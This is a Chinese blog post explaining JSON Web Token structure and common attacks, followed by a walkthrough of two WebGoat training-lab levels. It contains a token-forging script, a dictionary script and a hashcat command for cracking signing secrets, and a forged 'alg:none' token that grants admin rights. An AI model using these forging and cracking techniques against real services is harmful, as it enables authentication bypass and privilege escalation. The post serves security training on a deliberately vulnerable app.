JWT+webgoat部分解题

最新推荐文章于 2024-01-04 15:47:23 发布
最新推荐文章于 2024-01-04 15:47:23 发布
阅读量442 收藏 2
点赞数 1
文章标签: java 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47804678/article/details/129884205
版权

JWT

JWT作用:

授权:一旦用户登录,后续的请求都会带着JWT,从而允许用户访问该令牌允许的路由,服务和资源。它的开销很小并且可以在不同的域中使用。如:单点登录。

信息交换:在各方之间安全地传输信息。JWT可进行签名(如使用公钥/私钥对),因此可确保发件人。由于签名是使用标头和有效负载计算的,因此还可验证内容是否被篡改。

JWT结构

JWT(json web token),令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔:

令牌组成:

  1. 标头(Header)
  2. 有效载荷(Payload)
  3. 签名(Signature)
  4. token格式:head.payload.singurater 如:xxxxx.yyyy.zzzz

Header:使用的签名算法(alg) + 令牌类型(type)。

如一般常用HS256(HMAC+SHA256-一个密钥)、RS256(RSA+SHA256-一对公私钥);使用Base64编码组成(特征以eyJh开头)。

Payload :有效负载,包含声明;声明是有关实体(通常是用户)和其他数据的声明,不放用户敏感的信息,如密码。同样使用Base64编码。

标准中注册的声明 (建议但不强制使用)

# iss: jwt签发者

# sub: jwt所面向的用户

# aud: 接收jwt的一方

# exp: jwt的过期时间,这个过期时间必须要大于签发时间

# nbf: 定义在什么时间之前,该jwt都是不可用的

# iat: jwt的签发时间

# jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击

signature:对base64(Header).base64(Payload).secret整体使用Header中指定的签名算法(HS256)进行签名。secret就是我们的密钥。签名的作用是保证JWT没有被篡改

JWT认证原理:

安全问题:Base64是一种编码,是可逆的,所以只适合传递一些非敏感信息;JWT中不应该在负载中加入敏感的数据。如密码不能放在JWT中;JWT常用于设计用户认证、授权系统、web的单点登录。

JWT绕过

生成jwt token的脚本

#仅为HS256加密算法
import hmac
import base64
from hashlib import sha256
from urllib import parse as urlp

def b64url(str1):
    if type(str1) == str:
        return str(base64.b64encode(str1.encode('utf-8')), encoding="utf-8").strip('=').replace('+','-').replace('/','_')
    elif type(str1) == bytes:
        return str(base64.b64encode(str1), encoding="utf-8").strip('=').replace('+','-').replace('/','_')
    else:
        raise TypeError("The type of given argument must be string or bytes")

# Enter Your Infomation Here ...
header = b64url('{"alg":"HS256","typ":"JWT"}')
payload = b64url('{"sub":"1234567890","name":"John Doe","iat":1516239022}')
secret = 'happynewyear'.encode('utf-8')
# ###

sig = b64url(hmac.new(
    secret, (header+'.'+payload).encode('utf-8'), digestmod=sha256
).digest())

jwt = header+'.'+payload+'.'+sig
print(jwt)

1.更改Header的签名方式

在一些JWT库使用了none的情况下,就会出现可以不签名的漏洞。我们可以将HS256改成none,从而无需secret就能通过校验。

2.由历史JWT暴力猜解出secret/key。

根据之前的JWT,我们可以尝试暴力破解出其使用的密钥,这样就能够进行下一步伪造,成功通过校验。下面是copy大佬的一个脚本,可以根据字典(secret.txt)进行爆破。

爆破secrest的脚本

import jwt
import termcolor
 
jwt_str = R"eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDg0MDg1NywiZXhwIjoxNjQwODQwOTE3LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.7HdANKeLioK-GsBUY9af80gODrlkFURDDE6u0LbmWZw"
with open("secret.txt") as f:
    for line in f:
        key_ = line.strip()
        try:
            jwt.decode(jwt_str, verify=True, algorithms="HS256", key=key_)
            print('\r', '找到秘钥--->', termcolor.colored(key_, "green"), "<---")
            break
        except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuerError, jwt.exceptions.ImmatureSignatureError):
            print('\r', '找到秘钥--->', termcolor.colored(key_, "green"), "<---")
            break
        except jwt.exceptions.InvalidSignatureError:
            print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
            continue
    else:
        print('\r', '\b抱歉!没找到秘钥')

3.exp标头

exp声明了JWT的过期时间,如果没有exp的话,就有可能会有历史JWT令牌被重复利用的风险

4.利用kid标头

kid可能会在头部中,它是一个密钥标识符。kid是RFC标准中用来表示密钥存储位置的地方,服务端可以根据这个提示来寻找解密密钥。其中也会导致一些漏洞。

SQL注入

密钥存储在数据库中,使用kid字段查询相关内容,就容易出现sql注入的相关漏洞。当查询的参数可控时,就有可能传入指定的key,这样就造成了key可控,可以随意修改jwt令牌信息。

目录遍历

kid的值表示的是密钥存储的文件,通过构造payload,就可能会造成目录遍历漏洞。

另外还有好多类型,这里就不一一细说了,参考JWT安全漏洞以及常见攻击方式_jwt 漏洞_烟雨醉沉浮的博客-CSDN博客

下面是JWT相关的一些CVE漏洞

(CVE-2015-2951) alg=none签名绕过漏洞

(CVE-2016-10555) RS/HS256公钥不匹配漏洞

(CVE-2018-0114)密钥注入漏洞

(CVE-2019-20933/CVE-2020-28637)空白密码漏洞

(CVE-2020-28042)空签名漏洞

web345

WebGoat靶场-JWTtoken绕过

由于抓包的时候总能拦到很多无用的包:

于是我们设置一下拦截规则:

1.修改签名算法

先看他的要求:

可以看到他让我们拿到的token,并且还要通过修改token拿到admin的权限,最后重新投票。一开始只是guest权限,然后看到可以切换用户,我们切换到Tom账户,发现返回了access token

使用jwt解析(JSON Web Tokens - jwt.io):

可以看到使用的签名算法是hs256,同时admin的权限是false,那么我们如果将admin的权限改为true,那么就拥有了admin的权限,但是因为有签名,所以我们尝试把签名算法改为none,这样就可以绕过校验了

根据前面说过的原理,我们改之后的header和payload都转化为base64,没有签名所以第三部分就为空,这样新的token就生成了:

eyJhbGciOiAibm9uZSJ9.eyJpYXQiOjE2ODA4MzAwOTUsImFkbWluIjoidHJ1ZSIsInVzZXIiOiJUb20ifQ.

我们点击vote now,然后可以看到数据包中带着tom的token,现在将它替换成我们改的新token(后面还有一个带token的数据包,也要记得替换):

提交之后可以发现投票成功了:

2.爆破token的secret

可以看到这个是要求我们爆破出secret并把用户名修改为webgoat,这种可以使用上面的脚本,也可以使用kali中的hashcat进行爆破。

使用hashcat:

hashcat -m 16500 jwt.txt -a 3 -w 2 dic.txt --force

其中jwt.txt为token,dic.txt为字典,--force为

使用上面的脚本,可以得到结果:

注意我们应该安装的是PyJWT这个包而不是jwt,如果安装了jwt这个包的话,应该把这两个包都删掉再重新下载PyJWT,不然会报错。另外注意dic.txt应该换成自己的字典。

可以看到原来的信息是这样的:

那么我们知道了密钥之后就可以更改信息了,但是要注意,payload中的exp,也就是到期时间。这个是使用了时间戳,所以我们需要用时间戳(Unix timestamp)转换工具 - 在线工具来更改一下到期时间。

然后我们使用生成jwt的脚本或者在线的生成工具重新生成JWT的token:

提交后发现通关:

Don't know
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebGoat8 M17 JWT tokens 题解
伊维泽诺流浪记
03-24 2688
https://baijiahao.baidu.com/s?id=1608021814182894637&wfr=spider&for=pc https://www.freebuf.com/vuls/216457.html https://jwt.io/#encoded-jwt
jwt_tool:用于测试,调整和破解JSON Web令牌的工具包
04-29
JSON Web令牌工具包v2 jwt_tool.py是用于验证,伪造,扫描和篡改JWT(JSON Web令牌)的工具包。 其功能包括: 检查令牌的有效性 测试已知漏洞: (CVE-2015-2951) alg = none签名绕过漏洞 (CVE-2016-10555) RS / HS256公钥不匹配漏洞 (CVE-2018-0114)密钥注入漏洞 (CVE-2019-20933 / CVE-2020-28637)空白密码漏洞 (CVE-2020-28042)空签名漏洞 扫描配置错误或已知漏洞 模糊声明值以引发意外行为 测试机密/密钥文件/公共密钥/ JWKS密钥的有效性 通过高速字典攻击识别弱键 伪造新的令牌头和有效载荷内容,并使用密钥或通过其他攻击方法创建新的签名 时间戳篡改 RSA和ECDSA密钥生成和重建(来自JWKS文件) ...还有更多! 观众 该工具是为渗透测试人员
WebGoat 靶场 JWT tokens 四 五 七关通关教程
qq_45953122的博客
10-08 666
JWT的三个部分:头部(Header)、载荷(Payload)和签名(Signature)也就是Cookie字段的access_token的值。重点在 payload 声明中的 exp 和 username,exp 是 token 过期的时间戳,时间戳需要修改到当前时间之后,也就让它不过期。它是 WebGoat 服务器 JAR 文件,这是一个故意不安全的 Web 应用程序,用于安全培训和测试。粘贴到bp中(注:不需要复制其jwt的第三部分,但要跟上连接第三部分的。
WebGoat——JWT
qq_43698877的博客
01-04 887
WebGoat——JWT
Token 绕过 / JWT漏洞 / 垂直越权 / WebGoatJWT靶场 tokens–4、5、7 关
weixin_51559599的博客
12-07 1728
json 是一种数据格式,为了处理不同数据间的转换JWT 是 Token 的一种实现方式存放位置不一定,可能是 Cookie、url、Authorization 等。
我在WebGoat学习JWT
qq_44005305的博客
08-24 104
jwt在网络应用环境间传递声明而执行的一种基于JSON的开放标准,jwt用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。
webgoat- SQL Injection (intro)通关答案
白天像蚂蚁一样工作,晚上像蝴蝶一样生活
03-09 592
webgoat- SQL Injection (intro)通关答案
WebGoatJWT部分攻略
renyizou的博客
10-11 3869
环境搭建 使用docker容器搭建webgoat环境 什么是JWT Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准.该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(单点登录SSO:在多个应用系统中,只需要登录一次,就可以访问其他相互信任的应用系统。)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直
渗透学习-靶场篇-WebGoat靶场(JWT攻击)
qq_43696276的博客
12-11 2314
本次主要学习了javaweb项目方面任意出现的一些安全问题,最主要的是有关于JWT身份认证上的攻击,并利用webgoat靶场进行了一些实验。JWT的全称是Json Web Token。它遵循JSON格式,将用户信息加密到token里,服务器不保存任何用户信息,只保存密钥信息,通过使用特定加密算法验证token,通过token验证用户身份。基于token的身份验证可以替代传统的cookie+session身份验证方法。jwt由三个部分组成:header.payload.signature。
WebGoat靶场JWT tokens四五关通关教程(JWT token安全)
No_1_is_me的博客
11-11 1645
WebGoat靶场JWT tokens四五关通关教程
基于SpringBoot2+MybatisPlus+SpringSecurity+jwt+redis+Vue的前后端商城系统源码
05-13
yshop基于当前流行技术组合的前后端分离商城系统: SpringBoot2+MybatisPlus+SpringSecurity+jwt+redis+Vue的前后端分离的商城系统, 包含分类、sku、运费模板、素材库、小程序直播、拼团、砍价、商户管理、 秒杀、...
SpringBoot+SpringSecurity+JWT+MybatisPlus实现基于注解的权限验证
08-26
SpringBoot+SpringSecurity+JWT+MybatisPlus实现基于注解的权限验证,可根据注解的格式不同,做到角色权限控制,角色加资源权限控制等,粒度比较细化。 @PreAuthorize("hasAnyRole('ADMIN','USER')"):具有admin或...
springboot+mybatis-plus+jwt+redis的简易后端框架
04-10
一个简单的后端框架,实现步骤可以根据文章 ...2.springboot+JWT+redis实现token身份令牌验证(附代码)(超详细) https://blog.csdn.net/pengpm/article/details/124077041?spm=1001.2014.3001.5501
springboot+security+jwt+mybaits-plus+mysql实现权限管理
03-13
1.传统spring boot框架 2.security框架 3.jwt取代session 4.mybatis-plus+mysql【sql文件项目中有】 5.不想下载,可以看博客,博客中有写
springboot + jwt + websocket + 拦截
09-02
springboot + jwt + websocket + 拦截
JWT安全及WebGoat靶场
xy_wjyjw的博客
12-07 1458
cookie 是一个非常具体的东西,指的就是浏览器里面能永久存储的一种数据,仅仅是浏览器实现的一种数据存储功能。cookie 由服务器生成,发送给浏览器,浏览器把 cookie 以 kv 形式保存到某个目录下的文本文件内,下一次请求同一网站时会把该 cookie 发送给服务器。由于 cookie 是存在客户端上的,所以浏览器加入了一些限制确保 cookie 不会被恶意使用,同时不会占据太多磁盘空间,所以每个域的 cookie 数量是有限的。
JWT安全漏洞以及常见攻击方式
02-18 6346
随着web应用的日渐复杂化,某些场景下,仅使用Cookie、Session等常见的身份鉴别方式无法满足业务的需要,JWT也就应运而生,JWT可以有效的解决分布式场景下的身份鉴别问题,并且会规避掉一些安全问题,如CORS跨域漏洞,CSRF漏洞等。JWT即Json Web Token的缩写,顾名思义,是Token的一种。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。
物流信息 缺少jwt参数_对jwt的安全测试方式总结
weixin_39905695的博客
11-21 300
1. jwt简介相对于传统的session-cookie身份校验机制,Token Auth正在变得流行,也就是说把token信息全部存在于客户端。这篇文章就讲讲Token Auth的一种,jwt机制。jwt(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,...
security+jwt+threadlocal
最新发布
04-29
Security是指安全性,JWT是指JSON Web Token,ThreadLocal是指线程本地变量。 Security是一种保护计算机系统和数据免受未经授权的访问、使用、泄露、破坏的技术和方法。在软件开发中,安全性是一个重要的考虑因素,特别是在涉及用户身份验证和授权的应用程序中。 JWT是一种用于在网络应用间传递声明的一种基于JSON的开放标准(RFC 7519)。它可以通过数字签名来验证数据的完整性,并使用密钥对数据进行加密。JWT通常用于身份验证和授权,可以在用户登录后生成一个JWT,并将其作为令牌发送给客户端,客户端在后续的请求中携带该令牌来进行身份验证。 ThreadLocal是Java中的一个类,它提供了线程本地变量的功能。每个线程都有自己独立的ThreadLocal变量副本,线程之间互不干扰。ThreadLocal通常用于在多线程环境下保存线程私有的数据,比如用户身份信息、请求上下文等。 综合起来,security+jwt+threadlocal可以用于实现安全的身份验证和授权机制。通过使用JWT作为令牌,在用户登录后生成并发送给客户端,客户端在后续的请求中携带该令牌进行身份验证。而ThreadLocal可以用于在服务端保存用户的身份信息和请求上下文,以便在处理请求时能够获取到正确的用户信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值